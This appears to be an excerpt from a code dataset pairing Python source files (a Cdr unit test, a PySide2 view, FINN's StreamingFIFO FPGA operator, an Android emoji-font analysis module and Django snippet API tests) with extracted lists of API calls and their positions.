] | [((26, 45), 'ssf.SSF', 'SSF', ([], {'errors': '"""raise"""'}), "(errors='raise')\n", (29, 45), False, 'from ssf import SSF\n')] |
#
# Copyright 2014-2018 Neueda Ltd.
#
from cdr import Cdr
import unittest
field1 = 1
field2 = 2
field3 = 55
class TestCdr(unittest.TestCase):
def get_a_cdr(self):
d = Cdr()
d.setInteger(field1, 123)
d.setString(field2, "Hello")
d.setString(field3, "World")
return d
def test_set_integer(self):
d = self.get_a_cdr()
self.assertEqual(d.getInt32(field1), 123)
def test_set_string(self):
d = self.get_a_cdr()
d.setString(field2, "Hello")
self.assertEqual(d.getString(field2), "Hello")
def test_get_exception(self):
d = self.get_a_cdr()
with self.assertRaises(RuntimeError):
d.getInteger(4)
def test_to_string(self):
d = Cdr()
d.setInteger(field1, 123)
self.assertEqual(d.toString(), "1=123")
def test_str(self):
d = Cdr()
d.setInteger(field1, 123)
def test_nested(self):
d = Cdr()
e = Cdr()
e.setString(1, "hello")
e.setString(2, "world")
d.appendArray(1, e)
f = d.getArray(1)
self.assertEqual(e.getString(1), f[0].getString(1))
self.assertEqual(e.getString(2), f[0].getString(2))
def test_to_python_dict(self):
d = Cdr()
e = Cdr()
f = Cdr()
f[21] = 400
e[11] = 300
e[12] = [f]
d[1] = 100
d[2] = 200
d[3] = [e]
assert(d.toPythonDict()[3][0][12][0][21] == 400)
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"cdr.Cdr"
] | [((1531, 1546), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1544, 1546), False, 'import unittest\n'), ((184, 189), 'cdr.Cdr', 'Cdr', ([], {}), '()\n', (187, 189), False, 'from cdr import Cdr\n'), ((762, 767), 'cdr.Cdr', 'Cdr', ([], {}), '()\n', (765, 767), False, 'from cdr import Cdr\n'), ((887, 892), 'cdr.Cdr', 'Cdr', ([], {}), '()\n', (890, 892), False, 'from cdr import Cdr\n'), ((967, 972), 'cdr.Cdr', 'Cdr', ([], {}), '()\n', (970, 972), False, 'from cdr import Cdr\n'), ((985, 990), 'cdr.Cdr', 'Cdr', ([], {}), '()\n', (988, 990), False, 'from cdr import Cdr\n'), ((1278, 1283), 'cdr.Cdr', 'Cdr', ([], {}), '()\n', (1281, 1283), False, 'from cdr import Cdr\n'), ((1296, 1301), 'cdr.Cdr', 'Cdr', ([], {}), '()\n', (1299, 1301), False, 'from cdr import Cdr\n'), ((1314, 1319), 'cdr.Cdr', 'Cdr', ([], {}), '()\n', (1317, 1319), False, 'from cdr import Cdr\n')] |
# -*- coding: utf-8 -*-
"""
# @SoftwareIDE : PyCharm2020Pro
# @ProjectName : PySide2MVCFramework
# @FileName : view.py
# @Author : 胡守杰
# @Email : <EMAIL>
# @ZhFileDescription :
# @EnFileDescription :
"""
import os
from pyside2mvcframework.core.view import View
from conf.global_settings import BASE_PATH
class InputWindowView(View):
uiFilePath = os.path.join(BASE_PATH, "src\\window\\inputWindow\\inputWindow.ui")
if __name__ == '__main__':
print("unit test from {filename}".format(filename=__file__))
import sys
from PySide2.QtWidgets import QApplication
app = QApplication(sys.argv)
view = InputWindowView().birth()
view.show()
sys.exit(app.exec_())
| [
"PySide2.QtWidgets.QApplication",
"os.path.join"
] | [((417, 484), 'os.path.join', 'os.path.join', (['BASE_PATH', '"""src\\\\window\\\\inputWindow\\\\inputWindow.ui"""'], {}), "(BASE_PATH, 'src\\\\window\\\\inputWindow\\\\inputWindow.ui')\n", (429, 484), False, 'import os\n'), ((652, 674), 'PySide2.QtWidgets.QApplication', 'QApplication', (['sys.argv'], {}), '(sys.argv)\n', (664, 674), False, 'from PySide2.QtWidgets import QApplication\n')] |
# Copyright (c) 2020, Xilinx
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of FINN nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import numpy as np
from shutil import copy
import subprocess
import math
import warnings
from finn.custom_op.fpgadataflow.hlscustomop import HLSCustomOp
from finn.core.datatype import DataType
from onnx import TensorProto, helper
from finn.util.data_packing import npy_to_rtlsim_input, rtlsim_output_to_npy
from . import templates
class StreamingFIFO(HLSCustomOp):
def __init__(self, onnx_node):
super().__init__(onnx_node)
self.strm_fifo_wrapper = templates.strm_fifo_wrapper
def get_nodeattr_types(self):
my_attrs = {
# FIFO depth
"depth": ("i", True, 0),
# folded shape of input/output
"folded_shape": ("ints", True, []),
# FINN DataTypes for inputs/outputs
"dataType": ("s", True, ""),
# Toggle between hls or IPI implementation
# rtl - use the hls generated IP during stitching
# vivado - use the AXI Infrastructure FIFO
"impl_style": ("s", False, "rtl", {"rtl", "vivado"}),
# FPGA resource type for FIFOs when impl_style is vivado
# auto -- let Vivado decide
# block -- use BRAM
# distributed -- use LUTRAM
# ultra -- use URAM (on UltraScale+)
"ram_style": (
"s",
False,
"auto",
{"auto", "block", "distributed", "ultra"},
),
}
my_attrs.update(super().get_nodeattr_types())
return my_attrs
def make_shape_compatible_op(self, model):
exp_ishape = self.get_normal_input_shape()
oshape = self.get_normal_output_shape()
ishape = tuple(model.get_tensor_shape(self.onnx_node.input[0]))
assert ishape == tuple(exp_ishape), "Unexpect input shape for StreamingFIFO."
# implement tensor with correct shape
values = np.random.randn(*oshape).astype(np.float32)
return helper.make_node(
"Constant",
inputs=[],
outputs=[self.onnx_node.output[0]],
value=helper.make_tensor(
name="const_tensor",
data_type=TensorProto.FLOAT,
dims=values.shape,
vals=values.flatten().astype(float),
),
)
def infer_node_datatype(self, model):
node = self.onnx_node
idt = model.get_tensor_datatype(node.input[0])
if idt != self.get_input_datatype():
warn_str = "inputDataType changing for %s: %s -> %s " % (
node.name,
str(self.get_input_datatype()),
str(idt),
)
warnings.warn(warn_str)
self.set_nodeattr("dataType", idt.name)
# data type stays the same
model.set_tensor_datatype(node.output[0], idt)
def verify_node(self):
pass
def get_verilog_top_module_name(self):
"Return the Verilog top module name for this node."
node = self.onnx_node
prefixed_top_name = "%s" % (node.name)
return prefixed_top_name
def code_generation_ipgen(self, model, fpgapart, clk):
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
verilog_dir = "{}/project_{}/sol1/impl/verilog".format(
code_gen_dir, self.onnx_node.name
)
os.makedirs(verilog_dir)
# copy Q_srl.v from finn-rtllib to verilog directory
memstream_dir = "/workspace/finn/finn-rtllib/memstream/hdl/"
Q_file = os.path.join(memstream_dir, "Q_srl.v")
copy(Q_file, verilog_dir)
# empty code gen dictionary for new entries
self.code_gen_dict.clear()
self.code_gen_dict["$TOPNAME$"] = ["{}".format(self.onnx_node.name)]
self.code_gen_dict["$LAYER_NAME$"] = [
"{}_{}".format(self.onnx_node.name, self.onnx_node.name)
]
# make instream width a multiple of 8 for axi interface
in_width = self.get_instream_width_padded()
count_width = int(self.get_nodeattr("depth") - 1).bit_length()
self.code_gen_dict["$COUNT_RANGE$"] = ["[{}:0]".format(count_width - 1)]
self.code_gen_dict["$IN_RANGE$"] = ["[{}:0]".format(in_width - 1)]
self.code_gen_dict["$OUT_RANGE$"] = ["[{}:0]".format(in_width - 1)]
self.code_gen_dict["$WIDTH$"] = [str(in_width)]
self.code_gen_dict["$DEPTH$"] = [str(self.get_nodeattr("depth"))]
template = self.strm_fifo_wrapper
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
f = open(os.path.join(verilog_dir, "{}.v".format(self.onnx_node.name)), "w")
f.write(template)
f.close()
self.code_gen_dict.clear()
def ipgen_singlenode_code(self):
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
verilog_dir = "{}/project_{}/sol1/impl/verilog".format(
code_gen_dir, self.onnx_node.name
)
# prepare the IP packaging tcl template
template = templates.ip_package_tcl
self.code_gen_dict.clear()
self.code_gen_dict["$TOPNAME$"] = ["{}".format(self.onnx_node.name)]
# note: setting the root dir as absolute can cause path problems
# the ipgen script will be invoked from the sources dir so root_dir=. is OK
self.code_gen_dict["$VERILOG_DIR$"] = ["."]
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
f = open(os.path.join(verilog_dir, "package_ip.tcl"), "w")
f.write(template)
f.close()
# create a shell script and call Vivado to invoke the IP pkg script
make_project_sh = verilog_dir + "/make_ip.sh"
working_dir = os.environ["PWD"]
with open(make_project_sh, "w") as f:
f.write("#!/bin/bash \n")
f.write("cd {}\n".format(verilog_dir))
f.write("vivado -mode batch -source package_ip.tcl\n")
f.write("cd {}\n".format(working_dir))
bash_command = ["bash", make_project_sh]
process_compile = subprocess.Popen(bash_command, stdout=subprocess.PIPE)
process_compile.communicate()
# set ipgen_path and ip_path to point to the new packaged IP
self.set_nodeattr("ipgen_path", verilog_dir)
self.set_nodeattr("ip_path", verilog_dir)
vlnv = "xilinx.com:hls:%s:1.0" % (self.onnx_node.name)
self.set_nodeattr("ip_vlnv", vlnv)
self.code_gen_dict.clear()
def get_normal_input_shape(self):
depth = self.get_nodeattr("depth")
# depth has to be between 2 and 256 with the current
# StreamingFIFO implementation
assert depth >= 2, """Depth is too low"""
if depth > 256 and self.get_nodeattr("impl_style") == "rtl":
warnings.warn(
"Depth is high, set between 2 and 256 for efficient SRL implementation"
)
# derive normal shape from folded shape
# StreamingFIFOs are inserted in between fpgadataflow nodes
# the folded shape could be for example (1, nf, pe)
# with nf (neuron folding): mh // pe
# the normal input shape is in this case (1, mh)
# so to achieve this the two inner dimensions are multiplied
# and together with all previous dimensions
# this gives the normal input shape
folded_shape = self.get_nodeattr("folded_shape")
# extract inner dimension
inner_dim = folded_shape[-1]
# multiply with the next inner dimension
folding_factor = folded_shape[-2] * inner_dim
normal_ishape = []
# create the normal_ishape
for i in range(len(folded_shape) - 2):
normal_ishape.append(folded_shape[i])
normal_ishape.append(folding_factor)
return normal_ishape
def get_normal_output_shape(self):
return self.get_normal_input_shape()
def get_folded_input_shape(self):
return self.get_nodeattr("folded_shape")
def get_folded_output_shape(self):
return self.get_nodeattr("folded_shape")
def get_instream_width(self):
dtype = DataType[self.get_nodeattr("dataType")]
folded_shape = self.get_nodeattr("folded_shape")
in_width = folded_shape[-1] * dtype.bitwidth()
return in_width
def get_outstream_width(self):
dtype = DataType[self.get_nodeattr("dataType")]
folded_shape = self.get_nodeattr("folded_shape")
in_width = folded_shape[-1] * dtype.bitwidth()
return in_width
def execute_node(self, context, graph):
mode = self.get_nodeattr("exec_mode")
node = self.onnx_node
inp = context[node.input[0]]
exp_shape = self.get_normal_input_shape()
if mode == "cppsim":
output = inp
output = np.asarray([output], dtype=np.float32).reshape(*exp_shape)
context[node.output[0]] = output
elif mode == "rtlsim":
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
# create a npy file for the input of the node
assert (
str(inp.dtype) == "float32"
), """Input datatype is
not float32 as expected."""
expected_inp_shape = self.get_folded_input_shape()
reshaped_input = inp.reshape(expected_inp_shape)
if DataType[self.get_nodeattr("dataType")] == DataType.BIPOLAR:
# store bipolar activations as binary
reshaped_input = (reshaped_input + 1) / 2
export_idt = DataType.BINARY
else:
export_idt = DataType[self.get_nodeattr("dataType")]
# make copy before saving the array
reshaped_input = reshaped_input.copy()
np.save(os.path.join(code_gen_dir, "input_0.npy"), reshaped_input)
sim = self.get_rtlsim()
nbits = self.get_instream_width()
inp = npy_to_rtlsim_input(
"{}/input_0.npy".format(code_gen_dir), export_idt, nbits
)
super().reset_rtlsim(sim)
super().toggle_clk(sim)
output = self.rtlsim(sim, inp)
odt = DataType[self.get_nodeattr("dataType")]
target_bits = odt.bitwidth()
packed_bits = self.get_outstream_width()
out_npy_path = "{}/output.npy".format(code_gen_dir)
out_shape = self.get_folded_output_shape()
rtlsim_output_to_npy(
output, out_npy_path, odt, out_shape, packed_bits, target_bits
)
# load and reshape output
output = np.load(out_npy_path)
oshape = self.get_normal_output_shape()
output = np.asarray([output], dtype=np.float32).reshape(*oshape)
context[node.output[0]] = output
else:
raise Exception(
"""Invalid value for attribute exec_mode! Is currently set to: {}
has to be set to one of the following value ("cppsim", "rtlsim")""".format(
mode
)
)
def get_number_output_values(self):
folded_oshape = self.get_folded_output_shape()
return np.prod(folded_oshape[:-1])
def global_includes(self):
pass
def defines(self, var):
pass
def read_npy_data(self):
pass
def strm_decl(self):
pass
def docompute(self):
pass
def dataoutstrm(self):
pass
def save_as_npy(self):
pass
def blackboxfunction(self):
pass
def pragmas(self):
pass
def code_generation_ipi(self):
impl_style = self.get_nodeattr("impl_style")
if impl_style == "rtl":
return super().code_generation_ipi()
elif impl_style == "vivado":
cmd = []
node_name = self.onnx_node.name
depth = self.get_nodeattr("depth")
ram_style = self.get_nodeattr("ram_style")
# create a hierarchy for this layer, with the same port names
clk_name = self.get_verilog_top_module_intf_names()["clk"][0]
rst_name = self.get_verilog_top_module_intf_names()["rst"][0]
dout_name = self.get_verilog_top_module_intf_names()["m_axis"][0][0]
din_name = self.get_verilog_top_module_intf_names()["s_axis"][0][0]
cmd.append("create_bd_cell -type hier %s" % node_name)
cmd.append("create_bd_pin -dir I -type clk /%s/%s" % (node_name, clk_name))
cmd.append("create_bd_pin -dir I -type rst /%s/%s" % (node_name, rst_name))
cmd.append(
"create_bd_intf_pin -mode Master "
"-vlnv xilinx.com:interface:axis_rtl:1.0 /%s/%s"
% (node_name, dout_name)
)
cmd.append(
"create_bd_intf_pin -mode Slave "
"-vlnv xilinx.com:interface:axis_rtl:1.0 /%s/%s" % (node_name, din_name)
)
# instantiate and configure DWC
cmd.append(
"create_bd_cell -type ip "
"-vlnv xilinx.com:ip:axis_data_fifo:2.0 /%s/fifo" % node_name
)
cmd.append(
"set_property -dict [list CONFIG.FIFO_DEPTH {%d}] "
"[get_bd_cells /%s/fifo]" % (depth, node_name)
)
cmd.append(
"set_property -dict [list CONFIG.FIFO_MEMORY_TYPE {%s}] "
"[get_bd_cells /%s/fifo]" % (ram_style, node_name)
)
cmd.append(
"set_property -dict [list CONFIG.TDATA_NUM_BYTES {%d}] "
"[get_bd_cells /%s/fifo]"
% (np.ceil(self.get_outstream_width() / 8), node_name)
)
cmd.append(
"connect_bd_intf_net [get_bd_intf_pins %s/fifo/M_AXIS] "
"[get_bd_intf_pins %s/%s]" % (node_name, node_name, dout_name)
)
cmd.append(
"connect_bd_intf_net [get_bd_intf_pins %s/fifo/S_AXIS] "
"[get_bd_intf_pins %s/%s]" % (node_name, node_name, din_name)
)
cmd.append(
"connect_bd_net [get_bd_pins %s/%s] "
"[get_bd_pins %s/fifo/s_axis_aresetn]"
% (node_name, rst_name, node_name)
)
cmd.append(
"connect_bd_net [get_bd_pins %s/%s] "
"[get_bd_pins %s/fifo/s_axis_aclk]" % (node_name, clk_name, node_name)
)
return cmd
else:
raise Exception(
"FIFO implementation style %s not supported, please use rtl or vivado"
% impl_style
)
def bram_estimation(self):
"""Calculates resource estimation for BRAM"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
if impl == "rtl" or (impl == "vivado" and ram_type != "block"):
# Non-BRAM based implementation
return 0
if W == 1:
return math.ceil(depth / 16384)
elif W == 2:
return math.ceil(depth / 8192)
elif W <= 4:
return (math.ceil(depth / 4096)) * (math.ceil(W / 4))
elif W <= 9:
return (math.ceil(depth / 2048)) * (math.ceil(W / 9))
elif W <= 18 or depth > 512:
return (math.ceil(depth / 1024)) * (math.ceil(W / 18))
else:
return (math.ceil(depth / 512)) * (math.ceil(W / 36))
def uram_estimation(self):
"""Calculates resource estimation for URAM"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
if impl == "rtl" or (impl == "vivado" and ram_type != "ultra"):
# Non-BRAM based implementation
return 0
else:
return (math.ceil(depth / 4096)) * (math.ceil(W / 72))
def bram_efficiency_estimation(self):
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
bram16_est = self.bram_estimation()
if bram16_est == 0:
return 1
wbits = W * depth
bram16_est_capacity = bram16_est * 36 * 512
return wbits / bram16_est_capacity
def lut_estimation(self):
"""Calculates resource estimations for LUTs"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
address_luts = 2 * math.ceil(math.log(depth, 2))
if impl == "rtl" or (impl == "vivado" and ram_type == "distributed"):
ram_luts = (math.ceil(depth / 32)) * (math.ceil(W / 2))
else:
ram_luts = 0
return int(address_luts + ram_luts)
def prepare_rtlsim(self):
assert self.get_nodeattr("impl_style") != "vivado", (
"StreamingFIFO impl_style "
"cannot be vivado for rtlsim. Only impl_style=rtl supported."
)
super().prepare_rtlsim()
| [
"numpy.prod",
"finn.util.data_packing.rtlsim_output_to_npy",
"math.ceil",
"os.makedirs",
"subprocess.Popen",
"os.path.join",
"numpy.asarray",
"math.log",
"shutil.copy",
"warnings.warn",
"numpy.load",
"numpy.random.randn"
] | [((4864, 4888), 'os.makedirs', 'os.makedirs', (['verilog_dir'], {}), '(verilog_dir)\n', (4875, 4888), False, 'import os\n'), ((5036, 5074), 'os.path.join', 'os.path.join', (['memstream_dir', '"""Q_srl.v"""'], {}), "(memstream_dir, 'Q_srl.v')\n", (5048, 5074), False, 'import os\n'), ((5083, 5108), 'shutil.copy', 'copy', (['Q_file', 'verilog_dir'], {}), '(Q_file, verilog_dir)\n', (5087, 5108), False, 'from shutil import copy\n'), ((7852, 7906), 'subprocess.Popen', 'subprocess.Popen', (['bash_command'], {'stdout': 'subprocess.PIPE'}), '(bash_command, stdout=subprocess.PIPE)\n', (7868, 7906), False, 'import subprocess\n'), ((12985, 13012), 'numpy.prod', 'np.prod', (['folded_oshape[:-1]'], {}), '(folded_oshape[:-1])\n', (12992, 13012), True, 'import numpy as np\n'), ((4195, 4218), 'warnings.warn', 'warnings.warn', (['warn_str'], {}), '(warn_str)\n', (4208, 4218), False, 'import warnings\n'), ((7260, 7303), 'os.path.join', 'os.path.join', (['verilog_dir', '"""package_ip.tcl"""'], {}), "(verilog_dir, 'package_ip.tcl')\n", (7272, 7303), False, 'import os\n'), ((8571, 8662), 'warnings.warn', 'warnings.warn', (['"""Depth is high, set between 2 and 256 for efficient SRL implementation"""'], {}), "(\n 'Depth is high, set between 2 and 256 for efficient SRL implementation')\n", (8584, 8662), False, 'import warnings\n'), ((16926, 16950), 'math.ceil', 'math.ceil', (['(depth / 16384)'], {}), '(depth / 16384)\n', (16935, 16950), False, 'import math\n'), ((3420, 3444), 'numpy.random.randn', 'np.random.randn', (['*oshape'], {}), '(*oshape)\n', (3435, 3444), True, 'import numpy as np\n'), ((12233, 12321), 'finn.util.data_packing.rtlsim_output_to_npy', 'rtlsim_output_to_npy', (['output', 'out_npy_path', 'odt', 'out_shape', 'packed_bits', 'target_bits'], {}), '(output, out_npy_path, odt, out_shape, packed_bits,\n target_bits)\n', (12253, 12321), False, 'from finn.util.data_packing import npy_to_rtlsim_input, rtlsim_output_to_npy\n'), ((12407, 12428), 'numpy.load', 'np.load', (['out_npy_path'], {}), '(out_npy_path)\n', (12414, 12428), True, 'import numpy as np\n'), ((16991, 17014), 'math.ceil', 'math.ceil', (['(depth / 8192)'], {}), '(depth / 8192)\n', (17000, 17014), False, 'import math\n'), ((17810, 17833), 'math.ceil', 'math.ceil', (['(depth / 4096)'], {}), '(depth / 4096)\n', (17819, 17833), False, 'import math\n'), ((17838, 17855), 'math.ceil', 'math.ceil', (['(W / 72)'], {}), '(W / 72)\n', (17847, 17855), False, 'import math\n'), ((18497, 18515), 'math.log', 'math.log', (['depth', '(2)'], {}), '(depth, 2)\n', (18505, 18515), False, 'import math\n'), ((18620, 18641), 'math.ceil', 'math.ceil', (['(depth / 32)'], {}), '(depth / 32)\n', (18629, 18641), False, 'import math\n'), ((18646, 18662), 'math.ceil', 'math.ceil', (['(W / 2)'], {}), '(W / 2)\n', (18655, 18662), False, 'import math\n'), ((10598, 10636), 'numpy.asarray', 'np.asarray', (['[output]'], {'dtype': 'np.float32'}), '([output], dtype=np.float32)\n', (10608, 10636), True, 'import numpy as np\n'), ((11566, 11607), 'os.path.join', 'os.path.join', (['code_gen_dir', '"""input_0.npy"""'], {}), "(code_gen_dir, 'input_0.npy')\n", (11578, 11607), False, 'import os\n'), ((12502, 12540), 'numpy.asarray', 'np.asarray', (['[output]'], {'dtype': 'np.float32'}), '([output], dtype=np.float32)\n', (12512, 12540), True, 'import numpy as np\n'), ((17056, 17079), 'math.ceil', 'math.ceil', (['(depth / 4096)'], {}), '(depth / 4096)\n', (17065, 17079), False, 'import math\n'), ((17084, 17100), 'math.ceil', 'math.ceil', (['(W / 4)'], {}), '(W / 4)\n', (17093, 17100), False, 'import math\n'), ((17143, 17166), 'math.ceil', 'math.ceil', (['(depth / 2048)'], {}), '(depth / 2048)\n', (17152, 17166), False, 'import math\n'), ((17171, 17187), 'math.ceil', 'math.ceil', (['(W / 9)'], {}), '(W / 9)\n', (17180, 17187), False, 'import math\n'), ((17246, 17269), 'math.ceil', 'math.ceil', (['(depth / 1024)'], {}), '(depth / 1024)\n', (17255, 17269), False, 'import math\n'), ((17274, 17291), 'math.ceil', 'math.ceil', (['(W / 18)'], {}), '(W / 18)\n', (17283, 17291), False, 'import math\n'), ((17327, 17349), 'math.ceil', 'math.ceil', (['(depth / 512)'], {}), '(depth / 512)\n', (17336, 17349), False, 'import math\n'), ((17354, 17371), 'math.ceil', 'math.ceil', (['(W / 36)'], {}), '(W / 36)\n', (17363, 17371), False, 'import math\n')] |
import ast
import emoji
import os
import pandas as pd
_SUPPORT_CACHE_CSV = emoji.datafile('emoji_support.csv')
_API_LEVELS = {
1: ("(no codename)", "1.0"),
2: ("(no codename)", "1.1"),
3: ("Cupcake", "1.5 "),
4: ("Donut", "1.6 "),
5: ("Eclair", "2.0"),
6: ("Eclair", "2.0.1"),
7: ("Eclair", "2.1 "),
8: ("Froyo", "2.2.x "),
9: ("Gingerbread", "2.3 - 2.3.2 "),
10: ("Gingerbread", "2.3.3 - 2.3.7"),
11: ("Honeycomb", "3.0"),
12: ("Honeycomb", "3.1 "),
13: ("Honeycomb", "3.2.x"),
14: ("Ice Cream Sandwich", "4.0.1 - 4.0.2 "),
15: ("Ice Cream Sandwich", "4.0.3 - 4.0.4 "),
16: ("Jelly Bean", "4.1.x"),
17: ("Jelly Bean", "4.2.x"),
18: ("Jelly Bean", "4.3.x"),
19: ("KitKat", "4.4 - 4.4.4"),
21: ("Lollipop", "5.0"),
22: ("Lollipop", "5.1"),
23: ("Marshmallow", "6.0"),
24: ("Nougat", "7.0"),
25: ("Nougat", "7.1"),
26: ("Oreo", "8.0.0"),
27: ("Oreo", "8.1.0"),
28: ("Pie", "9"),
29: ("Android 10 (Q)", "10"),
30: ("Android 11 (R)", "11"),
31: ("Android 12 (S)", "12"),
}
def api_levels():
return _API_LEVELS
def is_font_file(file):
_, ext = os.path.splitext(file)
return ext.lower() in {'.ttf', '.otf', '.ttc'}
def metadata():
records = []
for root, dirs, files in os.walk('api_level'):
for file in files:
if is_font_file(file):
full_file = os.path.join(root, file)
api_level = int(os.path.basename(root))
size = os.stat(full_file).st_size
records.append((api_level, full_file, size))
df = pd.DataFrame(records)
df.columns = ['api_level', 'font_file', 'file_size']
return df
def emoji_support():
"""Dataframe of [emoji_level, font_file, codepoints, supported].
Includes every sequence we could find of any type.
Requires prior execution of populate_emoji_support.py"""
if not os.path.isfile(_SUPPORT_CACHE_CSV):
raise IOError('Please run populate_emoji_support.py first')
return (pd.read_csv(_SUPPORT_CACHE_CSV, converters={'cp_seq': ast.literal_eval})
.rename(columns={'cp_seq': 'codepoints'}))
def font_summary():
df = metadata()
sf = (df
.groupby(['api_level'])
.agg({'font_file': 'count', 'file_size': 'sum'}))
sf['file_size'] = sf['file_size'].apply(lambda sz: (sz / pow(2, 20)))
sf.rename(columns = {
'font_file': 'num_files',
'file_size': 'size_MB',
}, inplace=True)
sf['delta_size_MB'] = sf['size_MB'] - sf['size_MB'].shift(1)
sf.reset_index(inplace=True)
return sf
def emoji_detail():
df = emoji_support()
# merge emoji metadata to gain the status column
df = df.merge(emoji.metadata().drop(columns=['emoji_level']),
on='codepoints')
df = df[df['status'] == 'fully-qualified']
df = df.drop(columns='status')
df.supported = df.supported.astype('int32')
df['api_level'] = df.font_file.str.split('/').str[1]
df.api_level = df.api_level.astype('int32')
df['font_file'] = df.font_file.str.split('/').str[2]
return df
def emoji_summary():
df = emoji_detail()
sf = (df.groupby(['font_file', 'api_level', 'emoji_level'])
.agg({'supported': ['sum', 'count']}))
sf.columns = ['supported', 'total']
sf.reset_index(inplace=True)
sf2 = (sf.drop(columns='emoji_level')
.groupby('api_level')
.agg('sum')
.reset_index())
sf2['delta'] = sf2['supported'] - sf2['supported'].shift(1)
sf2.fillna(0, inplace=True)
return sf, sf2
| [
"pandas.read_csv",
"emoji.metadata",
"emoji.datafile",
"os.path.splitext",
"os.path.join",
"os.path.isfile",
"os.path.basename",
"pandas.DataFrame",
"os.stat",
"os.walk"
] | [((76, 111), 'emoji.datafile', 'emoji.datafile', (['"""emoji_support.csv"""'], {}), "('emoji_support.csv')\n", (90, 111), False, 'import emoji\n'), ((1107, 1129), 'os.path.splitext', 'os.path.splitext', (['file'], {}), '(file)\n', (1123, 1129), False, 'import os\n'), ((1238, 1258), 'os.walk', 'os.walk', (['"""api_level"""'], {}), "('api_level')\n", (1245, 1258), False, 'import os\n'), ((1507, 1528), 'pandas.DataFrame', 'pd.DataFrame', (['records'], {}), '(records)\n', (1519, 1528), True, 'import pandas as pd\n'), ((1809, 1843), 'os.path.isfile', 'os.path.isfile', (['_SUPPORT_CACHE_CSV'], {}), '(_SUPPORT_CACHE_CSV)\n', (1823, 1843), False, 'import os\n'), ((1919, 1991), 'pandas.read_csv', 'pd.read_csv', (['_SUPPORT_CACHE_CSV'], {'converters': "{'cp_seq': ast.literal_eval}"}), "(_SUPPORT_CACHE_CSV, converters={'cp_seq': ast.literal_eval})\n", (1930, 1991), True, 'import pandas as pd\n'), ((1332, 1356), 'os.path.join', 'os.path.join', (['root', 'file'], {}), '(root, file)\n', (1344, 1356), False, 'import os\n'), ((2578, 2594), 'emoji.metadata', 'emoji.metadata', ([], {}), '()\n', (2592, 2594), False, 'import emoji\n'), ((1381, 1403), 'os.path.basename', 'os.path.basename', (['root'], {}), '(root)\n', (1397, 1403), False, 'import os\n'), ((1420, 1438), 'os.stat', 'os.stat', (['full_file'], {}), '(full_file)\n', (1427, 1438), False, 'import os\n')] |
import json
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from paste import constants
from tests.mixins import SnippetListTestCaseMixin
from tests.utils import constant, create_snippet, create_user
class SnippetListTestCase(SnippetListTestCaseMixin, APITestCase):
"""Tests for the snippet list view."""
def url(self):
"""Return the snippet list URL."""
return reverse('snippet-list')
def post(self, **kwargs):
"""Send a POST request to the view's URL with data indicated by given
kwargs, as JSON, using the proper content-type, and return the
response.
"""
return self.client.post(
self.url(), data=json.dumps(kwargs),
content_type='application/json')
def test_get_success(self):
"""Snippet list GET must return all the viewable snippets."""
create_snippet('foo')
create_snippet('bar')
response = self.get()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 2)
self.assertEqual(response.data[0]['content'], 'foo')
self.assertEqual(response.data[1]['content'], 'bar')
def test_get_private(self):
"""Snippet list GET must return private snippets only to those
authorized to view them.
"""
owner = create_user('owner')
create_snippet('foo', private=True, owner=owner)
expected = [0, 0, 1, 1]
def check(i):
response = self.get()
self.assertEqual(len(response.data), expected[i])
self.check_for_users(check, owner)
def test_get_list_foreign(self):
"""Snippet list GET must not return snippets owned by other users if
the LIST_FOREIGN setting is True, unless requested by a staff user.
"""
create_snippet('foo')
create_snippet('bar', owner=self.user)
expected = [0, 1, 2]
def check(i):
response = self.get()
self.assertEqual(len(response.data), expected[i])
with constant('LIST_FOREIGN', False):
self.check_for_users(check)
def test_post_success(self):
"""Snippet list POST must create a new snippet."""
response = self.post(
content='foo', style='friendly', embed_title=False)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data['content'], 'foo')
self.assertEqual(response.data['title'], '')
self.assertEqual(response.data['language'], '')
self.assertEqual(response.data['style'], 'friendly')
self.assertEqual(
